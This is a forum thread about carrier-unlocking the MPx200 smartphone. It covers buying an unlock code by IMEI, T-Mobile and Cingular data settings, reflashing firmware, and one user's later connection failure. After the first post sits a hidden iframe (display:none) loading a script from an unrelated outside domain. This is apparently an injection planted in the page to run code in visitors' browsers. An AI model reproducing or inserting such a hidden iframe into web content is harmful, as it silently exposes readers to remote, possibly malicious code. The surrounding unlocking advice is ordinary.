All you need is your IMEI number which is located on a sticker on the original box or under the battery, on a sticker, along with the ESN and HEX numbers.
Then contact Adam Roth at GSMPhonesource.com, give him the IMEI number and $20 and he will send you a code.
On the phone, if you insert a non AT&T SIM, it will come up with a screen asking you to input a network unlock code ( 8 digits for the MPx200) This is where you enter the code Adam will provide. Then all you have to do is set up all of your non AT&T settings (WAP, GPRS, etc...). The phone and all of the organizer functionality will work as soon as you enter the unlock code.
Let me know if you have any other questions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I've thought about getting one of these phones if I could unlock it. But what do you do when (if) there is a SmartPhone 2003 upgrade? Normally you can only get this through the carrier...
For the 2003 update, I don't think it will be available from anyone as the update utilizes different hardware, ie... processor, etc... I can not confirm this 100% but usually with a different platform, the older model phones are not upgradeable.
If you have unocked your MXP200 and wish to use the T-Mobile service, as I have, then you can use the following settings. If you need further details on how to do this, please let me know.

As for unlocking the phone, this company provided excellent and fast service. They charged me $15 and my phone was unlocked within an hour. They have live support page on their website if you have any questions about the service or need help unlocking the phone.
Cool... so where did you buy it? I want to get one and try it on T-Mobile! Since there is no AT&T coverage where I live, I can't buy one the normal way.
Since unlocking the device is no longer a problem. Can you try out AT&T and if you don't like it cancel the service? Umm, try it out so that you can say get the phone for $150.00 from Amazon?
The Amazon route should work. Just make certain there is an x day trial period for the service and that Amazon will not charge you additional for the phone when you cancle early. Usually they do not get into that much detail, but check it out anyway.
you guys rock. I'm off to best buy to pick it up again and get it unlocked. now I just need to get Cingular's wap/gprs settings (which I think are visible in my Siemens).

You can buy one at CompUSA. I just picked one up there and unfortunately had to pay full retail ($400). Best Buy wouldn't let me just pay retail. They said that I had to activate the phone in the store. The guy helping me was new so you may have better luck.

EH, you are AWESOME! I was dreading trying to find out what settings to use (based on my previous experience with Cingular and setting up a pda). Thanks a million, man.
IF YOU WONDER WHAT MY MOTIVE IS FOR POSTING THIS, MY CARRIER REFUSES TO UNLOCK ANY PHONES FOR ANY PERSON FOR REASON. EVEN IF LEGITMATE, SUCH AS INTERNATION TRAVEL. SO THIS IS WHAT I HAVE TO SAY ABOUT THEIR B.S. POLICY.... EVERYONE OUT THEIR ENJOY!!!!
I had some problems setting up Wap for TMobile in the Houston area with the above settings. After finding several different discussions and trying a combination of things I got it to work. Here is what I did. Things I changed or added comment from the above thread are noted with ***
Additional note: I downloaded another firmware and flashed the phone. It did the following: wiped out AT&T logos, etc, enabled 900 Mhz, and probably a couple of other things. The ring-tones are now different and also much louder and I can actually here the phone when it rings, even when in my pocket. I can also use the web browser without having to get the data package.

I have had an MPx200 connecting to T-Mobile for about 6 months now.
All of a sudden, a couple of weeks ago, it quits working. So I take out the SIM card and try it on another phone, and that phone connects fine to T-Zones.
So I put the card back in the MPx, and it doesn't work. I get a message saying
"Error. Unable to connect. Please verify that airplane mode is off and you have network coverage, then try again."
I have made the settings just as described here...same thing.
Don't panic yet, I have had intermittent problems with TMobile. Just last week, for about the whole day. Woke up the next morning and all was working again. I hope this is the case with yours.
It worked for 6 months, then stopped. I have tried it for three weeks now, nada. In three different counties even. And I plug my SIM into another phone, and it works perfectly.
Something with the phone, but I have made the settings match exactly what's been posted.
